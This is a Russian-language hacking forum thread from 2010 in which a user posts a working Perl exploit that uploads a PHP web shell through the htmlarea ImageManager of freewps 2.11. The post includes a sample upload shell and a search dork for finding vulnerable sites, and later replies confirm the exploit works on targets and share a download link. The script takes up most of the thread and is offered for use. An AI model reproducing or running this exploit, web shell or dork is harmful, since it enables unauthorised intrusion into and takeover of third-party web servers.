Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
freewps<=2.11 remote shell uploader exploit |
04.03.2010, 22:40
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
freewps<=2.11 remote shell uploader exploit
Переделан из http://www.milw0rm.com/exploits/704
вместо http://www.milw0rm.com/exploits/1600
dork: inurl:/htmlarea/popups/ImageManager/images.php
Код:
## freewps<=2.11 remote shell uploader exploit ##
use IO::Socket;
if(@ARGV < 1){
usage();
exit;
}
open(FILE, 'shell.php'); # your shell code here (max 2 kb);
#############################################################################################################
# shell code example:
#<?php if(isset($_POST['go'])){if(is_uploaded_file($_FILES['userfile']['tmp_name'])){@copy($_FILES['userfile']['tmp_name'],$_FILES['userfile']['name']);}}?>
#<form enctype=multipart/form-data method=post><input name='userfile' type=file><input type=submit name='go'></form>
##############################################################################################################
$path = ""; # path to /htmlarea/
@file = <FILE>;
close(FILE);
$shell = join('', @file);
$shell_name = 'lala4.php'; # shell name
print "-=[ freewps<=2.11 remote shell uploader ]=-\n";
print " by Pashkela [bugtrack team] 2010 \n\n";
print " from http://www.milw0rm.com/exploits/704 \n\n";
print " instead of http://www.milw0rm.com/exploits/1600 \n\n";
$host[0] = $ARGV[0];
if($host[0] =~ /\//){
($host[1],$host[2])=split(/\//,$host[0]);
$host[0] =~ /\/(.*)/;
$host[3] = "/";
$host[3] .= $1;
}
$host[1] = $host[0] if(!$host[1]);
print "# $host[1]\n";
$path = $host[3] . $path . "/htmlarea/popups/ImageManager/images.php";
$socket=IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>$host[1],PeerPort=>80,Timeout=>10)|| die " s0k off\n";
print $socket "POST $path HTTP/1.1\r\n";
print $socket "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
print $socket "Referer: http://www.lapropinacultural.com.ar/handlers/htmlarea/popups/insert_image.php\r\n";
print $socket "Accept-Language: pt\r\n";
print $socket "Content-Type: multipart/form-data; boundary=---------------------------7d410e113f8\r\n";
print $socket "Accept-Encoding: gzip, deflate\r\n";
print $socket "User-Agent: l33t br0ws3r\r\n";
print $socket "Host: $host[1]\r\n";
print $socket "Content-Length: 1646\r\n";
print $socket "Connection: Keep-Alive\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"dirPath\"\r\n\r\n";
print $socket "/\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"url\"\r\n\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"width\"\r\n\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"vert\"\r\n\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"alt\"\r\n\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"height\"\r\n\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"horiz\"\r\n\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"upload\"; filename=\"$shell_name\"\r\n";
print $socket "Content-Type: application/octet-stream\r\n\r\n";
print $socket "$shell\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"align\"\r\n\r\n";
print $socket "baseline\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"border\"\r\n\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"orginal_width\"\r\n\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"orginal_height\"\r\n\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"constrain_prop\"\r\n\r\n";
print $socket "on\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"ok\"\r\n\r\n";
print $socket "Refresh\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"ok\"\r\n\r\n";
print $socket "OK\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"cancel\"\r\n\r\n";
print $socket "Cancel\r\n";
print $socket "-----------------------------7d410e113f8--\r\n\r\n\r\n\r\n";
@socket = <$socket>;
foreach $teste(@socket){
if($teste=~ /<title>Image Browser<\/title>/){
print "# Shell uploaded!\n";
print "# Here: \n# $host[0]/$shell_name\n";
$result = 1;
}
}
close($socket);
if($result){
exit;
} else {
print "Exploit failed..."
}
sub usage(){
print "-=[ freewps<=2.11 remote shell uploader ]=-\n";
print " by Pashkela [bugtrack team] 2010 \n\n";
print " from http://www.milw0rm.com/exploits/704 \n\n";
print " instead of http://www.milw0rm.com/exploits/1600 \n\n";
print "# usage: perl $0 <host> \n";
}
Последний раз редактировалось Pashkela; 04.03.2010 в 23:02..
|
|
|
04.03.2010, 23:04
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
А там разве не требуется залогиниться, прежде чем аплоадить что-либо?
|
|
|
|
04.03.2010, 23:07
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
ну скажем так мне сегодня не пришлось логиница)
PS: И потом при чем здесь пароль, можно иметь пароль от админки но шелл таки не залить, просто из админки
Последний раз редактировалось Pashkela; 05.03.2010 в 00:15..
|
|
|
|
05.03.2010, 01:22
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813
Репутация:
1396
|
|
Сработало на Ура. сенкс что писал под меня))
|
|
|
|
05.03.2010, 01:53
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Так значит, типа обход авторизации там? Я пробовал отправить запрос как в примере скриптом на php - только форма входа в ответе.
|
|
|
|
05.03.2010, 02:00
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
нет никакого обхода авторизации. Просто где-то есть пароль, где-то нет, где-то в админке это запихнуто, где-то в корень
Сделано в принципе потому, что сплойт, выложенный на milw0rm, не пашет нихрена в стандартнейшей ситуации
Тестировалось все как локально, так и удаленно
|
|
|
|
05.03.2010, 02:18
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
То есть это просто аплоадер, встроенный в цмски (как fckeditor или tinyms)? в таком случае, если доступ к админке есть и там стоит этот filemanager - то залить шелл с его помощью - в чем проблема то? Просто один запрос на аплоад, я думал обход авторизации или заливка запрещенных расширений файлов.
PS кстати, а почему \r\n по три штуки?
|
|
|
|
05.03.2010, 03:46
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
вот скачай и посмотри, что это такое:
http://slil.ru/28745844
Последний раз редактировалось Pashkela; 05.03.2010 в 04:10..
|
|
|
|
05.03.2010, 14:42
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Даа, теперь понятно. Хорошенькая штучка  Работает. |
|
|
|
|
 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид